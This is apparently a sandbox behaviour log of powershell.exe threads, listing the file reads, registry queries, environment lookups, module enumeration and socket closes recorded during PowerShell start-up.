| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 950 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
68 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 452 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 4096 |
|
51 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 2970 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 102, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
3 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 |
Thread 0xef8
2
7
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xf24
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xf28
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_Disabled |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_MinCount |
|
1 |
Thread 0xf40
637
44
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
15 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\Wbem, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\, type = file_attributes |
|
9 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Defender, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
